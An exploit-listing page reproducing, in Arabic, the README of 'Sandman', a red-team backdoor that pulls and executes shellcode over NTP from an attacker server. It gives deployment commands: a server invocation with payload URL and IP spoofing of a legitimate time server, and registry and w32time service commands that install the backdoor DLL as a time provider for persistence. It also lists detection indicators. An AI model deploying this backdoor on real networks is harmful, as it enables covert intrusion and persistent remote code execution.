Sploitus

Exploit for Sandman

kitploit · 2026-08-29

Exploit Code

MARKDOWN116 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IDOV31-SANDMAN
# ساندمان

![Image](https://img.shields.io/badge/C%23-239120?style=for-the-badge&logo=c-sharp&logoColor=white%22) ![image](https://img.shields.io/badge/Python-3776AB?style=for-the-badge&logo=python&logoColor=white) ![image](https://img.shields.io/badge/Windows-0078D6?style=for-the-badge&logo=windows&logoColor=white)

ساندمان هو باب خلفي مصمم للعمل على الشبكات المحصنة أثناء عمليات الفريق الأحمر.

يعمل ساندمان كمرحّل ويستفيد من NTP (بروتوكول مزامنة الوقت والتاريخ) لجلب وتنفيذ **شيلكود** عشوائي من خادم مُحدد مسبقًا.

بما أن NTP هو بروتوكول يتم تجاهله من قبل العديد من المدافعين، مما يؤدي إلى سهولة الوصول إلى الشبكة.

## الاستخدام

![Sandman](https://assets.kitploit.com/production/public/readmes/5632/648bcedc757583c243f62b929edacf3fd245ae64e254ad3e6e14cc408d639fc4.png)

### خادم ساندمان (الاستخدام)

يعمل على ويندوز / أنظمة يونكس:

root@kitploit:~
    
    
    python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
    

  * محول الشبكة: المحول الذي تريد أن يستمع عليه الخادم (مثال: Ethernet لويندوز، eth0 ليونكس).

  * رابط الحمولة: الرابط إلى الشيلكود الخاص بك، قد يكون وكيلك (مثال: CobaltStrike أو meterpreter) أو مرحّل آخر.

  * العنوان IP للتزوير: إذا كنت ترغب في تزوير عنوان IP شرعي (مثال: عنوان time.microsoft.com).




### الباب الخلفي لساندمان (الاستخدام)

للبدء، يمكنك ترجمة الباب الخلفي لساندمان كما هو مذكور أدناه، لأنه ملف تنفيذي خفيف بلغة C# يمكنك تشغيله عبر ExecuteAssembly، أو تشغيله كموفر NTP، أو مجرد تنفيذه/حقنه.

### موفر وقت الباب الخلفي لساندمان (الاستخدام)

لاستخدامه، ستحتاج إلى اتباع خطوات بسيطة:

  * أضف قيمة التسجيل التالية:



root@kitploit:~
    
    
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
    

  * أعد تشغيل خدمة w32time:



root@kitploit:~
    
    
    sc stop w32time
    sc start w32time
    

**ملاحظة: تأكد من أنك تترجم باستخدام خيار x64 وليس أي خيار CPU!**

## القدرات

  * جلب وتنفيذ حمولة عشوائية من خادم يتحكم به المهاجم.

  * يمكن العمل على الشبكات المحصنة لأن NTP عادةً ما يكون مسموحًا به في جدار الحماية.

  * انتحال شخصية خادم NTP شرعي عبر تزوير IP.




## الإعداد

### خادم ساندمان (الإعداد)

  * بايثون 3.9

  * المتطلبات محددة في ملف requirements.




### الباب الخلفي لساندمان (الإعداد)

لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ولكن كما هو مذكور في قسم الاستخدام، يمكن تجميعه باستخدام كل من VS2022 و CSC. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.

### موفر وقت الباب الخلفي لساندمان (الإعداد)

لتجميع الباب الخلفي، استخدمت Visual Studio 2022، ستحتاج أيضًا إلى تثبيت DllExport (عبر Nuget أو أي طريقة أخرى) لتجميعه. يمكنك تجميعه إما باستخدام USE_SHELLCODE واستخدام شيلكود Orca أو بدون USE_SHELLCODE لاستخدام WebClient.

## مؤشرات الاختراق (IOCs)

  * يتم حقن شيلكود في RuntimeBroker.

  * يبدأ اتصال NTP المشبوه برأس سحري معروف.

  * قاعدة YARA.




## المساهمون

  * Orca للشيلكود.

  * شكر خاص لـ Tim McGuffin على فكرة موفر الوقت.




شكرًا لمن ساهم بالفعل وسأقبل المساهمات بكل سرور، قم بعمل طلب سحب وسأراجعه!